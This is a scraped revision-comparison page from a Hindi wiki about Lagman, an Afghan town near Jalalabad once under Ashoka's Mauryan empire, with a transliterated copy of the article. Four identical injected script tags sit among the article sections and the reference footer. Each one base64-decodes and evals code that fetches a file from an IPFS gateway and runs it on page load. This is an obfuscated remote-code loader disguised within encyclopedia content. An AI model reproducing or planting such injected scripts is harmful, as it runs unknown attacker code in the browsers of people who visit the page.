Difference between revisions of "लगमान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''लगमान''' अथवा 'लमगान' अफ़ग़ानिस्तान में जलालाबाद ...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
'''लगमान''' अथवा 'लमगान' [[अफ़ग़ानिस्तान]] में [[जलालाबाद]] और क़ाबुल नदी के उत्तरी तट पर स्थित एक स्थानीय नगर है। पुरातात्विक खोजों से यह सिद्ध हुआ है कि, पहले यह नगर सम्राट [[अशोक]] के साम्राज्य के अंतर्गत आता था।
+
'''लगमान''' अथवा 'लमगान' [[अफ़ग़ानिस्तान]] में [[जलालाबाद]] और [[काबुल नदी]] के उत्तरी तट पर स्थित एक स्थानीय नगर है। पुरातात्विक खोजों से यह सिद्ध हुआ है कि, पहले यह नगर सम्राट [[अशोक]] के साम्राज्य के अंतर्गत आता था।
  
 
*इस नगर के पास ही पुले दुरन्ता में आरामाई भाषा में [[मौर्य]] सम्राट [[अशोक के शिलालेख|अशोक का शिलालेख]] मिला है।
 
*इस नगर के पास ही पुले दुरन्ता में आरामाई भाषा में [[मौर्य]] सम्राट [[अशोक के शिलालेख|अशोक का शिलालेख]] मिला है।
 
*इससे यह प्रमाणित होता है कि, 'लगमान' अशोक के [[मौर्य साम्राज्य]] के अंतर्गत ही आता था।
 
*इससे यह प्रमाणित होता है कि, 'लगमान' अशोक के [[मौर्य साम्राज्य]] के अंतर्गत ही आता था।
*अशोक के लगभग एक हज़ार वर्ष बाद यह जयपाल के राज्य में सम्मिलित था।
+
*अशोक के लगभग एक हज़ार वर्ष बाद यह [[जयपाल]] के राज्य में सम्मिलित था।
*लगभग 990 ई. में अमीर सुबुक्तगीन ने इसे जयपाल से छीन लिया।
+
*लगभग 990 ई. में अमीर [[सुबुक्तगीन]] ने इसे जयपाल से छीन लिया।
 
*इसके बाद से ही 'लगमान' [[अफ़ग़ानिस्तान]] के राज्य का एक भाग है।
 
*इसके बाद से ही 'लगमान' [[अफ़ग़ानिस्तान]] के राज्य का एक भाग है।
  
Line 13: Line 13:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
[[Category:ऐतिहासिक स्थान कोश]][[Category:इतिहास कोश]][[Category:विदेशी स्थान]][[Category:मौर्य काल]][[Category:]]
+
[[Category:ऐतिहासिक स्थान कोश]][[Category:इतिहास कोश]][[Category:विदेशी स्थान]][[Category:मौर्य काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:13, 15 September 2012

lagaman athava 'lamagan' afaganistan mean jalalabad aur kabul nadi ke uttari tat par sthit ek sthaniy nagar hai. puratatvik khojoan se yah siddh hua hai ki, pahale yah nagar samrat ashok ke samrajy ke aantargat ata tha.

  • is nagar ke pas hi pule duranta mean aramaee bhasha mean maury samrat ashok ka shilalekh mila hai.
  • isase yah pramanit hota hai ki, 'lagaman' ashok ke maury samrajy ke aantargat hi ata tha.
  • ashok ke lagabhag ek hazar varsh bad yah jayapal ke rajy mean sammilit tha.
  • lagabhag 990 ee. mean amir subuktagin ne ise jayapal se chhin liya.
  • isake bad se hi 'lagaman' afaganistan ke rajy ka ek bhag hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 417 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>